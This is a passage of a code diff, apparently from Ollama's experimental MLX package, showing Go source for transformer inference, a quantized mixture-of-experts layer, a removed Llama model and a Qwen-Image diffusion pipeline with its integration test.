[]int64{int64(L * cfg.NumKeyValueHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumKeyValueHeads * cfg.HeadDim), 1}, 0)
offset := 0
if c != nil {
offset = c.Offset()
}
if a.YarnFreqs != nil {
if a.YarnMscale != 1.0 {
q = mlx.MulScalar(q, a.YarnMscale)
}
q = mlx.RoPEWithFreqs(q, a.YarnFreqs, int(cfg.HeadDim), false, 1.0, offset)
k = mlx.RoPEWithFreqs(k, a.YarnFreqs, int(cfg.HeadDim), false, 1.0, offset)
} else {
q = mlx.RoPE(q, int(cfg.HeadDim), false, cfg.RopeTheta, 1.0, offset)
k = mlx.RoPE(k, int(cfg.HeadDim), false, cfg.RopeTheta, 1.0, offset)
}
if c != nil {
k, v = c.Update(k, v, int(L))
}
out := mlx.ScaledDotProductAttentionWithSinks(q, k, v, cfg.Scale, maskMode, mask, a.Sinks)
out = mlx.Reshape(mlx.Transpose(out, 0, 2, 1, 3), B, L, cfg.NumAttentionHeads*cfg.HeadDim)
return a.OProj.Forward(out)
}
// CreateSlidingWindowMask creates a causal mask with sliding window
// Mirrors mlx-lm's create_causal_mask with window_size
func CreateSlidingWindowMask(seqLen, queryStart, keyStart, keyLen, windowSize int) *mlx.Array {
// Build mask aligned to actual cache length (may be rotated)
// rinds covers existing keys: [keyStart, keyStart+keyLen)
// linds covers new queries: [queryStart, queryStart+seqLen)
rinds := mlx.Arange(float32(keyStart), float32(keyStart+keyLen), 1) // [keyLen]
linds := mlx.Arange(float32(queryStart), float32(queryStart+seqLen), 1) // [seqLen]
linds = mlx.ExpandDims(linds, 1) // [seqLen, 1]
rinds = mlx.ExpandDims(rinds, 0) // [1, keyLen]
causalMask := mlx.GreaterEqual(linds, rinds) // [seqLen, keyLen]
windowLimit := mlx.AddScalar(rinds, float32(windowSize))
windowMask := mlx.LessArray(linds, windowLimit) // [seqLen, keyLen]
return mlx.LogicalAnd(causalMask, windowMask)
}
// MoE represents the Mixture of Experts SwiGLU layer with quantized experts.
type MoE struct {
Router *nn.Linear `weight:"mlp.router"`
TopK int32
HiddenSize int32
GroupSize int
Bits int
// Expert weights (loaded manually via sanitizeExpertWeights)
GateBlocks, GateScales, GateBias *mlx.Array
UpBlocks, UpScales, UpBias *mlx.Array
DownBlocks, DownScales, DownBias *mlx.Array
}
func (moe *MoE) Forward(x *mlx.Array, B, L int32) *mlx.Array {
logits := moe.Router.Forward(x)
neg := mlx.Neg(logits)
part := mlx.Argpartition(neg, int(moe.TopK)-1, -1)
topKIdx := mlx.Slice(part, []int32{0, 0, 0}, []int32{B, L, moe.TopK})
topKVal := mlx.TakeAlongAxis(logits, topKIdx, -1)
weights := mlx.Softmax(topKVal, -1)
xFlat := mlx.Reshape(x, B*L, 1, 1, moe.HiddenSize)
idxFlat := mlx.Reshape(topKIdx, B*L, moe.TopK)
doSort := B*L >= 64
var invOrder *mlx.Array
sorted := false
n := B * L * moe.TopK
if doSort {
idxAll := mlx.Flatten(idxFlat)
order := mlx.Argsort(idxAll, 0)
invOrder = mlx.Argsort(order, 0)
xFlat = mlx.ExpandDims(mlx.Take(mlx.Squeeze(xFlat, 1), mlx.FloorDivideScalar(order, moe.TopK), 0), 1)
idxFlat = mlx.Reshape(mlx.Take(idxAll, order, 0), n, 1)
sorted = true
}
gate := mlx.GatherQMM(xFlat, moe.GateBlocks, moe.GateScales, nil, nil, idxFlat, true, moe.GroupSize, moe.Bits, "mxfp4", sorted)
up := mlx.GatherQMM(xFlat, moe.UpBlocks, moe.UpScales, nil, nil, idxFlat, true, moe.GroupSize, moe.Bits, "mxfp4", sorted)
if moe.GateBias != nil {
gate = mlx.Add(gate, mlx.ExpandDims(mlx.Take(moe.GateBias, idxFlat, 0), 2))
}
if moe.UpBias != nil {
up = mlx.Add(up, mlx.ExpandDims(mlx.Take(moe.UpBias, idxFlat, 0), 2))
}
hidden := getCompiledSwiGLU().Call(gate, up)[0]
down := mlx.GatherQMM(hidden, moe.DownBlocks, moe.DownScales, nil, nil, idxFlat, true, moe.GroupSize, moe.Bits, "mxfp4", sorted)
if moe.DownBias != nil {
down = mlx.Add(down, mlx.ExpandDims(mlx.Take(moe.DownBias, idxFlat, 0), 2))
}
if doSort {
down = mlx.Reshape(mlx.Take(mlx.Squeeze(mlx.Squeeze(down, 2), 1), invOrder, 0), B*L, moe.TopK, moe.HiddenSize)
} else {
down = mlx.Squeeze(down, 2)
}
ewFlat := mlx.Reshape(weights, B*L, moe.TopK, 1)
return mlx.Reshape(mlx.Sum(mlx.Mul(down, ewFlat), 1, false), B, L, moe.HiddenSize)
}
type Block struct {
Attention *Attention
MLP *MoE
InputNorm *nn.RMSNorm `weight:"input_layernorm"`
PostAttnNorm *nn.RMSNorm `weight:"post_attention_layernorm"`
LayerType string // "sliding_attention" or "full_attention"
}
func (b *Block) Forward(x *mlx.Array, c cache.Cache, B, L int32, mask *mlx.Array, maskMode string, cfg *Config) *mlx.Array {
h := mlx.Add(x, b.Attention.Forward(b.InputNorm.Forward(x, cfg.RMSNormEps), c, B, L, mask, maskMode, cfg))
return mlx.Add(h, b.MLP.Forward(b.PostAttnNorm.Forward(h, cfg.RMSNormEps), B, L))
}
type Model struct {
EmbedTokens *nn.Embedding `weight:"model.embed_tokens"`
Layers []*Block `weight:"-"` // loaded manually due to MoE sanitization
Norm *nn.RMSNorm `weight:"model.norm"`
LMHead *nn.Linear `weight:"lm_head"`
tok *tokenizer.Tokenizer
*Config
}
func (m *Model) Tokenizer() *tokenizer.Tokenizer { return m.tok }
func (m *Model) NumLayers() int { return len(m.Layers) }
func (m *Model) VocabSize() int32 { return m.Config.VocabSize }
func (m *Model) NewCache(int32) []cache.Cache {
caches := make([]cache.Cache, len(m.Layers))
for i, layer := range m.Layers {
if layer.LayerType == "sliding_attention" && m.SlidingWindow > 0 {
caches[i] = cache.NewRotatingKVCache(int(m.SlidingWindow))
} else {
caches[i] = cache.NewKVCache()
}
}
return caches
}
func (m *Model) Forward(tokens *mlx.Array, caches []cache.Cache) *mlx.Array {
B, L := tokens.Shape()[0], tokens.Shape()[1]
x := m.EmbedTokens.Forward(tokens)
// Find representative cache indices for sliding window attention
var swaIdx int = -1
for i, layer := range m.Layers {
if layer.LayerType == "sliding_attention" {
swaIdx = i
break
}
}
// Create masks once at model level
var fullMask, swaMask *mlx.Array
var fullMaskMode, swaMaskMode string
if L > 1 {
fullMaskMode = "causal"
if swaIdx >= 0 && m.SlidingWindow > 0 && caches != nil {
c := caches[swaIdx]
offset := c.Offset()
windowSize := int(m.SlidingWindow)
cacheLen := min(int(L), windowSize)
if offset > 0 {
cacheLen = min(c.Len()+int(L), windowSize)
}
if int(L) > windowSize {
swaMask = CreateSlidingWindowMask(int(L), offset, offset+int(L)-cacheLen, cacheLen, windowSize)
} else {
swaMaskMode = "causal"
}
} else {
swaMaskMode = "causal"
}
}
for i, layer := range m.Layers {
var c cache.Cache
if caches != nil {
c = caches[i]
}
mask, maskMode := fullMask, fullMaskMode
if layer.LayerType == "sliding_attention" {
mask, maskMode = swaMask, swaMaskMode
}
x = layer.Forward(x, c, B, L, mask, maskMode, m.Config)
}
return m.LMHead.Forward(m.Norm.Forward(x, m.RMSNormEps))
}
// sanitizeExpertWeights splits merged gate_up weights into separate gate/up arrays.
// MXFP4 quantized weights require contiguous memory - strided views give wrong results.
func sanitizeExpertWeights(weights *safetensors.ModelWeights, prefix string) (moe *MoE) {
gateUpBlocks, _ := weights.GetTensor(prefix + ".mlp.experts.gate_up_proj_blocks")
gateUpScales, _ := weights.GetTensor(prefix + ".mlp.experts.gate_up_proj_scales")
gateUpBias, _ := weights.GetTensor(prefix + ".mlp.experts.gate_up_proj_bias")
downBlocks, _ := weights.GetTensor(prefix + ".mlp.experts.down_proj_blocks")
downScales, _ := weights.GetTensor(prefix + ".mlp.experts.down_proj_scales")
downBias, _ := weights.GetTensor(prefix + ".mlp.experts.down_proj_bias")
moe = &MoE{GroupSize: 32, Bits: 4, DownScales: downScales, DownBias: downBias}
if gateUpBlocks != nil {
gub := mlx.FlattenRange(mlx.View(gateUpBlocks, int(mlx.DtypeUint32)), -2, -1)
s := gub.Shape()
moe.GateBlocks = mlx.Contiguous(mlx.SliceStride(gub, []int32{0, 0, 0}, []int32{s[0], s[1], s[2]}, []int32{1, 2, 1}))
moe.UpBlocks = mlx.Contiguous(mlx.SliceStride(gub, []int32{0, 1, 0}, []int32{s[0], s[1], s[2]}, []int32{1, 2, 1}))
}
if gateUpScales != nil {
s := gateUpScales.Shape()
moe.GateScales = mlx.Contiguous(mlx.SliceStride(gateUpScales, []int32{0, 0, 0}, []int32{s[0], s[1], s[2]}, []int32{1, 2, 1}))
moe.UpScales = mlx.Contiguous(mlx.SliceStride(gateUpScales, []int32{0, 1, 0}, []int32{s[0], s[1], s[2]}, []int32{1, 2, 1}))
}
if gateUpBias != nil {
s := gateUpBias.Shape()
moe.GateBias = mlx.Contiguous(mlx.SliceStride(gateUpBias, []int32{0, 0}, []int32{s[0], s[1]}, []int32{1, 2}))
moe.UpBias = mlx.Contiguous(mlx.SliceStride(gateUpBias, []int32{0, 1}, []int32{s[0], s[1]}, []int32{1, 2}))
}
if downBlocks != nil {
moe.DownBlocks = mlx.FlattenRange(mlx.View(downBlocks, int(mlx.DtypeUint32)), -2, -1)
}
return moe
}
func Load(modelPath string) (*Model, error) {
data, err := os.ReadFile(filepath.Join(modelPath, "config.json"))
if err != nil {
return nil, fmt.Errorf("load config: %w", err)
}
var cfg Config
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
cfg.Scale = float32(1.0 / math.Sqrt(float64(cfg.HeadDim)))
weights, err := safetensors.LoadModelWeights(modelPath)
if err != nil {
return nil, fmt.Errorf("load weights: %w", err)
}
tok, err := tokenizer.Load(filepath.Join(modelPath, "tokenizer.json"))
if err != nil {
return nil, fmt.Errorf("load tokenizer: %w", err)
}
m := &Model{
Layers: make([]*Block, cfg.NumHiddenLayers),
Config: &cfg,
tok: tok,
}
// Load simple weights via struct tags
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return nil, err
}
// Load layers with custom MoE handling
for i := int32(0); i < cfg.NumHiddenLayers; i++ {
prefix := fmt.Sprintf("model.layers.%d", i)
layer := &Block{}
if err := safetensors.LoadModule(layer, weights, prefix); err != nil {
return nil, fmt.Errorf("layer %d: %w", i, err)
}
// Initialize attention YaRN
layer.Attention.initYarn(&cfg)
// Load MoE with weight sanitization
moe := sanitizeExpertWeights(weights, prefix)
moe.Router = layer.MLP.Router // Router was loaded by LoadModule
moe.TopK = cfg.NumExpertsPerTok
moe.HiddenSize = cfg.HiddenSize
layer.MLP = moe
// Set layer type
layer.LayerType = "full_attention"
if int(i) < len(cfg.LayerTypes) {
layer.LayerType = cfg.LayerTypes[i]
}
m.Layers[i] = layer
}
// Release safetensors BEFORE eval - lazy arrays have captured data,
// this reduces peak memory by freeing mmap during materialization
weights.ReleaseAll()
mlx.Eval(mlx.Collect(m)...)
return m, nil
}
func (m *Model) MaxContextLength() int32 {
if m.RopeScaling != nil && m.RopeScaling.OriginalMaxPositionEmbeddings > 0 {
return m.RopeScaling.OriginalMaxPositionEmbeddings
}
return 131072
}

View File

@@ -1,152 +0,0 @@
//go:build mlx
package llama
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
"github.com/ollama/ollama/x/imagegen/safetensors"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
type Config struct {
HiddenSize int32 `json:"hidden_size"`
NumHiddenLayers int32 `json:"num_hidden_layers"`
IntermediateSize int32 `json:"intermediate_size"`
NumAttentionHeads int32 `json:"num_attention_heads"`
NumKeyValueHeads int32 `json:"num_key_value_heads"`
VocabSize int32 `json:"vocab_size"`
RMSNormEps float32 `json:"rms_norm_eps"`
RopeTheta float32 `json:"rope_theta"`
MaxPositionEmbeddings int32 `json:"max_position_embeddings"`
HeadDim int32 `json:"-"`
Scale float32 `json:"-"`
}
type Model struct {
EmbedTokens *nn.Embedding `weight:"model.embed_tokens"`
Layers []*Layer `weight:"model.layers"`
Norm *nn.RMSNorm `weight:"model.norm"`
Output *nn.Linear `weight:"lm_head,optional"`
tok *tokenizer.Tokenizer
*Config
}
type Layer struct {
Attention *Attention
MLP *MLP
AttentionNorm *nn.RMSNorm `weight:"input_layernorm"`
MLPNorm *nn.RMSNorm `weight:"post_attention_layernorm"`
}
type Attention struct {
QProj *nn.Linear `weight:"self_attn.q_proj"`
KProj *nn.Linear `weight:"self_attn.k_proj"`
VProj *nn.Linear `weight:"self_attn.v_proj"`
OProj *nn.Linear `weight:"self_attn.o_proj"`
}
type MLP struct {
GateProj *nn.Linear `weight:"mlp.gate_proj"`
UpProj *nn.Linear `weight:"mlp.up_proj"`
DownProj *nn.Linear `weight:"mlp.down_proj"`
}
func Load(modelPath string) (*Model, error) {
data, err := os.ReadFile(filepath.Join(modelPath, "config.json"))
if err != nil {
return nil, fmt.Errorf("load config: %w", err)
}
var cfg Config
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
cfg.HeadDim = cfg.HiddenSize / cfg.NumAttentionHeads
cfg.Scale = float32(1.0 / math.Sqrt(float64(cfg.HeadDim)))
weights, err := safetensors.LoadModelWeights(modelPath)
if err != nil {
return nil, fmt.Errorf("load weights: %w", err)
}
tok, err := tokenizer.Load(filepath.Join(modelPath, "tokenizer.json"))
if err != nil {
return nil, fmt.Errorf("load tokenizer: %w", err)
}
m := &Model{
Layers: make([]*Layer, cfg.NumHiddenLayers),
Config: &cfg,
tok: tok,
}
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return nil, err
}
m.Output = nn.NewLinear(m.EmbedTokens.Weight, nil)
mlx.Eval(mlx.Collect(m)...)
weights.ReleaseAll()
return m, nil
}
func (m *Model) Forward(tokens *mlx.Array, caches []cache.Cache) *mlx.Array {
B, L := tokens.Shape()[0], tokens.Shape()[1]
h := m.EmbedTokens.Forward(tokens)
for i, layer := range m.Layers {
h = layer.Forward(h, caches[i], B, L, m.Config)
}
return m.Output.Forward(m.Norm.Forward(h, m.RMSNormEps))
}
func (l *Layer) Forward(x *mlx.Array, c cache.Cache, B, L int32, cfg *Config) *mlx.Array {
h := mlx.Add(x, l.Attention.Forward(l.AttentionNorm.Forward(x, cfg.RMSNormEps), c, B, L, cfg))
return mlx.Add(h, l.MLP.Forward(l.MLPNorm.Forward(h, cfg.RMSNormEps)))
}
func (a *Attention) Forward(x *mlx.Array, c cache.Cache, B, L int32, cfg *Config) *mlx.Array {
q := a.QProj.Forward(x)
k := a.KProj.Forward(x)
v := a.VProj.Forward(x)
q = mlx.AsStrided(q, []int32{B, cfg.NumAttentionHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumAttentionHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumAttentionHeads * cfg.HeadDim), 1}, 0)
k = mlx.AsStrided(k, []int32{B, cfg.NumKeyValueHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumKeyValueHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumKeyValueHeads * cfg.HeadDim), 1}, 0)
v = mlx.AsStrided(v, []int32{B, cfg.NumKeyValueHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumKeyValueHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumKeyValueHeads * cfg.HeadDim), 1}, 0)
q = mlx.RoPE(q, int(cfg.HeadDim), false, cfg.RopeTheta, 1.0, c.Offset())
k = mlx.RoPE(k, int(cfg.HeadDim), false, cfg.RopeTheta, 1.0, c.Offset())
k, v = c.Update(k, v, int(L))
out := mlx.ScaledDotProductAttention(q, k, v, cfg.Scale, L > 1)
out = mlx.Reshape(mlx.Transpose(out, 0, 2, 1, 3), B, L, cfg.NumAttentionHeads*cfg.HeadDim)
return a.OProj.Forward(out)
}
func (m *MLP) Forward(x *mlx.Array) *mlx.Array {
return m.DownProj.Forward(mlx.Mul(mlx.SiLU(m.GateProj.Forward(x)), m.UpProj.Forward(x)))
}
// Interface methods
func (m *Model) NumLayers() int { return len(m.Layers) }
func (m *Model) MaxContextLength() int32 { return m.MaxPositionEmbeddings }
func (m *Model) VocabSize() int32 { return m.Config.VocabSize }
func (m *Model) Tokenizer() *tokenizer.Tokenizer { return m.tok }
func (m *Model) NewCache(maxSeqLen int32) []cache.Cache {
caches := make([]cache.Cache, len(m.Layers))
for i := range caches {
caches[i] = cache.NewKVCache()
}
return caches
}

View File

@@ -1,66 +0,0 @@
//go:build mlx
package qwen_image
import (
"os"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// TestPipelineOutput runs the full pipeline (integration test).
// Skips if model weights not found. Requires ~50GB VRAM.
func TestPipelineOutput(t *testing.T) {
modelPath := "../../../weights/Qwen-Image-2512"
if _, err := os.Stat(modelPath); os.IsNotExist(err) {
t.Skip("Skipping: model weights not found at " + modelPath)
}
// Load model
pm, err := LoadPersistent(modelPath)
if err != nil {
t.Skipf("Skipping: failed to load model: %v", err)
}
// Run 2-step pipeline (minimum for stable scheduler)
cfg := &GenerateConfig{
Prompt: "a cat",
Width: 256,
Height: 256,
Steps: 2,
Seed: 42,
}
output, err := pm.GenerateFromConfig(cfg)
if err != nil {
t.Fatalf("Pipeline failed: %v", err)
}
mlx.Eval(output)
// Verify output shape [1, C, H, W]
shape := output.Shape()
if len(shape) != 4 {
t.Errorf("Expected 4D output, got %v", shape)
}
if shape[0] != 1 || shape[1] != 3 || shape[2] != cfg.Height || shape[3] != cfg.Width {
t.Errorf("Shape mismatch: got %v, expected [1, 3, %d, %d]", shape, cfg.Height, cfg.Width)
}
// Verify values in expected range [0, 1]
data := output.Data()
minVal, maxVal := float32(1.0), float32(0.0)
for _, v := range data {
if v < minVal {
minVal = v
}
if v > maxVal {
maxVal = v
}
}
t.Logf("Output range: [%.4f, %.4f]", minVal, maxVal)
if minVal < -0.1 || maxVal > 1.1 {
t.Errorf("Output values out of range: [%.4f, %.4f]", minVal, maxVal)
}
}

View File

File diff suppressed because it is too large Load Diff

View File

@@ -1,350 +0,0 @@
//go:build mlx
// Package qwen_image implements the Qwen-Image diffusion transformer model.
package qwen_image
import (
"context"
"fmt"
"path/filepath"
"time"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// GenerateConfig holds all options for image generation.
type GenerateConfig struct {
Prompt string
NegativePrompt string // Empty = no CFG
CFGScale float32 // Only used if NegativePrompt is set (default: 4.0)
Width int32 // Image width (default: 1024)
Height int32 // Image height (default: 1024)
Steps int // Denoising steps (default: 30)
Seed int64 // Random seed
Progress ProgressFunc // Optional progress callback
// Layer caching (DeepCache/Learning-to-Cache speedup)
LayerCache bool // Enable layer caching (default: false)
CacheInterval int // Refresh cache every N steps (default: 3)
CacheLayers int // Number of shallow layers to cache (default: 25)
}
// ProgressFunc is called during generation with step progress.
type ProgressFunc func(step, totalSteps int)
// Model represents a Qwen-Image diffusion model.
type Model struct {
ModelPath string
Tokenizer *tokenizer.Tokenizer
TextEncoder *Qwen25VL
Transformer *Transformer
VAEDecoder *VAEDecoder
}
// Load loads the Qwen-Image model from a directory.
func (m *Model) Load(modelPath string) error {
fmt.Println("Loading Qwen-Image model...")
start := time.Now()
if mlx.GPUIsAvailable() {
mlx.SetDefaultDeviceGPU()
mlx.EnableCompile()
}
m.ModelPath = modelPath
// Load tokenizer
fmt.Print(" Loading tokenizer... ")
tokenizerPath := filepath.Join(modelPath, "tokenizer")
tok, err := tokenizer.Load(tokenizerPath)
if err != nil {
return fmt.Errorf("tokenizer: %w", err)
}
m.Tokenizer = tok
fmt.Println("✓")
// Load text encoder (Qwen2.5-VL in text-only mode - skip vision tower for efficiency)
m.TextEncoder = &Qwen25VL{}
if err := m.TextEncoder.LoadTextOnly(filepath.Join(modelPath, "text_encoder")); err != nil {
return fmt.Errorf("text encoder: %w", err)
}
mlx.Eval(mlx.Collect(m.TextEncoder)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
// Load transformer
m.Transformer = &Transformer{}
if err := m.Transformer.Load(filepath.Join(modelPath, "transformer")); err != nil {
return fmt.Errorf("transformer: %w", err)
}
mlx.Eval(mlx.Collect(m.Transformer)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
// Load VAE decoder
m.VAEDecoder = &VAEDecoder{}
if err := m.VAEDecoder.Load(filepath.Join(modelPath, "vae")); err != nil {
return fmt.Errorf("VAE decoder: %w", err)
}
mlx.Eval(mlx.Collect(m.VAEDecoder)...)
fmt.Printf(" (%.1f GB, peak %.1f GB)\n",
float64(mlx.MetalGetActiveMemory())/(1024*1024*1024),
float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
mem := mlx.MetalGetActiveMemory()
peak := mlx.MetalGetPeakMemory()
fmt.Printf(" Loaded in %.2fs (%.1f GB active, %.1f GB peak)\n",
time.Since(start).Seconds(),
float64(mem)/(1024*1024*1024),
float64(peak)/(1024*1024*1024))
return nil
}
// Generate creates an image from a prompt.
func (m *Model) Generate(prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
})
}
// GenerateWithProgress creates an image with progress callback.
func (m *Model) GenerateWithProgress(prompt string, width, height int32, steps int, seed int64, progress ProgressFunc) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
Progress: progress,
})
}
// GenerateWithCFG creates an image with classifier-free guidance.
func (m *Model) GenerateWithCFG(prompt, negativePrompt string, width, height int32, steps int, seed int64, cfgScale float32, progress ProgressFunc) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
Prompt: prompt,
NegativePrompt: negativePrompt,
CFGScale: cfgScale,
Width: width,
Height: height,
Steps: steps,
Seed: seed,
Progress: progress,
})
}
// GenerateFromConfig generates an image using the unified config struct.
func (m *Model) GenerateFromConfig(cfg *GenerateConfig) (*mlx.Array, error) {
start := time.Now()
result, err := m.generate(cfg)
if err != nil {
return nil, err
}
if cfg.NegativePrompt != "" {
fmt.Printf("Generated with CFG (scale=%.1f) in %.2fs (%d steps)\n", cfg.CFGScale, time.Since(start).Seconds(), cfg.Steps)
} else {
fmt.Printf("Generated in %.2fs (%d steps)\n", time.Since(start).Seconds(), cfg.Steps)
}
return result, nil
}
// GenerateImage implements model.ImageModel interface.
func (m *Model) GenerateImage(ctx context.Context, prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.Generate(prompt, width, height, steps, seed)
}
// generate is the internal denoising pipeline.
func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
// Apply defaults
if cfg.Width <= 0 {
cfg.Width = 1024
}
if cfg.Height <= 0 {
cfg.Height = 1024
}
if cfg.Steps <= 0 {
cfg.Steps = 30
}
if cfg.CFGScale <= 0 {
cfg.CFGScale = 4.0
}
if cfg.CacheInterval <= 0 {
cfg.CacheInterval = 3
}
if cfg.CacheLayers <= 0 {
cfg.CacheLayers = 25 // ~42% of 60 layers (similar ratio to Z-Image's 15/38)
}
useCFG := cfg.NegativePrompt != ""
tcfg := m.Transformer.Config
latentH := cfg.Height / 8
latentW := cfg.Width / 8
pH := latentH / tcfg.PatchSize
pW := latentW / tcfg.PatchSize
imgSeqLen := pH * pW
// Text encoding
var posEmb, negEmb *mlx.Array
{
posEmb = m.TextEncoder.EncodePrompt(m.Tokenizer, cfg.Prompt)
if useCFG {
negEmb = m.TextEncoder.EncodePrompt(m.Tokenizer, cfg.NegativePrompt)
mlx.Keep(posEmb, negEmb)
mlx.Eval(posEmb, negEmb)
} else {
mlx.Keep(posEmb)
mlx.Eval(posEmb)
}
}
// Pad sequences to same length for CFG
txtLen := posEmb.Shape()[1]
if useCFG {
negLen := negEmb.Shape()[1]
if negLen > txtLen {
txtLen = negLen
}
if posEmb.Shape()[1] < txtLen {
posEmb = padSequence(posEmb, txtLen)
}
if negEmb.Shape()[1] < txtLen {
negEmb = padSequence(negEmb, txtLen)
}
mlx.Keep(posEmb, negEmb)
}
// Scheduler
scheduler := NewFlowMatchScheduler(DefaultSchedulerConfig())
scheduler.SetTimesteps(cfg.Steps, imgSeqLen)
// Init latents [B, C, T, H, W]
var latents *mlx.Array
{
latents = scheduler.InitNoise([]int32{1, tcfg.OutChannels, 1, latentH, latentW}, cfg.Seed)
mlx.Eval(latents)
}
// RoPE cache
var ropeCache *RoPECache
{
ropeCache = PrepareRoPE(pH, pW, txtLen, tcfg.AxesDimsRope)
mlx.Keep(ropeCache.ImgFreqs, ropeCache.TxtFreqs)
mlx.Eval(ropeCache.ImgFreqs)
}
// Layer cache for DeepCache/Learning-to-Cache speedup
var stepCache *cache.StepCache
if cfg.LayerCache {
stepCache = cache.NewStepCache(cfg.CacheLayers)
fmt.Printf(" Layer caching: %d layers, refresh every %d steps\n", cfg.CacheLayers, cfg.CacheInterval)
}
// Denoising loop
for i := 0; i < cfg.Steps; i++ {
stepStart := time.Now()
if cfg.Progress != nil {
cfg.Progress(i+1, cfg.Steps)
}
t := scheduler.Timesteps[i]
timestep := mlx.ToBFloat16(mlx.NewArray([]float32{t}, []int32{1}))
// Squeeze temporal dim: [B, C, T, H, W] -> [B, C, H, W]
latents2D := mlx.Squeeze(latents, 2)
patches := PackLatents(latents2D, tcfg.PatchSize)
var output *mlx.Array
if useCFG {
// True CFG: run twice and combine with norm rescaling
// Note: layer caching with CFG is not supported yet (would need 2 caches)
posOutput := m.Transformer.Forward(patches, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
negOutput := m.Transformer.Forward(patches, negEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
diff := mlx.Sub(posOutput, negOutput)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
combPred := mlx.Add(negOutput, scaledDiff)
// Norm rescaling: rescale combined prediction to match conditional prediction's norm
condNorm := mlx.Sqrt(mlx.Sum(mlx.Square(posOutput), -1, true))
combNorm := mlx.Sqrt(mlx.Sum(mlx.Square(combPred), -1, true))
output = mlx.Mul(combPred, mlx.Div(condNorm, combNorm))
} else if stepCache != nil {
output = m.Transformer.ForwardWithCache(patches, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs,
stepCache, i, cfg.CacheInterval, cfg.CacheLayers)
} else {
output = m.Transformer.Forward(patches, posEmb, timestep, ropeCache.ImgFreqs, ropeCache.TxtFreqs)
}
noisePred := UnpackLatents(output, latentH, latentW, tcfg.PatchSize)
oldLatents := latents
latents = scheduler.Step(noisePred, latents, i)
// Keep cached arrays alive across cleanup
if stepCache != nil {
mlx.Keep(stepCache.Arrays()...)
}
mlx.Eval(latents)
oldLatents.Free()
activeMem := float64(mlx.MetalGetActiveMemory()) / (1024 * 1024 * 1024)
peakMem := float64(mlx.MetalGetPeakMemory()) / (1024 * 1024 * 1024)
fmt.Printf(" Step %d/%d: t=%.4f (%.2fs) [%.1f GB active, %.1f GB peak]\n", i+1, cfg.Steps, t, time.Since(stepStart).Seconds(), activeMem, peakMem)
}
// Free denoising temporaries before VAE decode
posEmb.Free()
if negEmb != nil {
negEmb.Free()
}
ropeCache.ImgFreqs.Free()
ropeCache.TxtFreqs.Free()
if stepCache != nil {
stepCache.Free()
}
// VAE decode (Decode manages its own pools for staged memory)
decoded := m.VAEDecoder.Decode(latents)
latents.Free()
// Post-process: squeeze temporal dim and rescale to [0, 1]
{
decoded = mlx.Squeeze(decoded, 2)
decoded = mlx.AddScalar(decoded, 1.0)
decoded = mlx.DivScalar(decoded, 2.0)
mlx.Eval(decoded)
}
fmt.Printf(" Peak memory: %.2f GB\n", float64(mlx.MetalGetPeakMemory())/(1024*1024*1024))
return decoded, nil
}
// padSequence pads a sequence tensor to the target length with zeros
func padSequence(x *mlx.Array, targetLen int32) *mlx.Array {
shape := x.Shape()
currentLen := shape[1]
if currentLen >= targetLen {
return x
}
padLen := targetLen - currentLen
// Pad on sequence dimension (axis 1)
return mlx.Pad(x, []int32{0, 0, 0, padLen, 0, 0})
}
// LoadPersistent is an alias for backward compatibility.
// Use m := &Model{}; m.Load(path) instead.
func LoadPersistent(modelPath string) (*Model, error) {
m := &Model{}
if err := m.Load(modelPath); err != nil {
return nil, err
}
return m, nil
}

View File

@@ -1,218 +0,0 @@
//go:build mlx
package qwen_image
import (
"math"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// SchedulerConfig holds FlowMatchEulerDiscreteScheduler configuration
type SchedulerConfig struct {
NumTrainTimesteps int32 `json:"num_train_timesteps"` // 1000
BaseShift float32 `json:"base_shift"` // 0.5
MaxShift float32 `json:"max_shift"` // 0.9
BaseImageSeqLen int32 `json:"base_image_seq_len"` // 256
MaxImageSeqLen int32 `json:"max_image_seq_len"` // 8192
ShiftTerminal float32 `json:"shift_terminal"` // 0.02
UseDynamicShift bool `json:"use_dynamic_shifting"` // true
}
// DefaultSchedulerConfig returns config for FlowMatchEulerDiscreteScheduler
func DefaultSchedulerConfig() *SchedulerConfig {
return &SchedulerConfig{
NumTrainTimesteps: 1000,
BaseShift: 0.5,
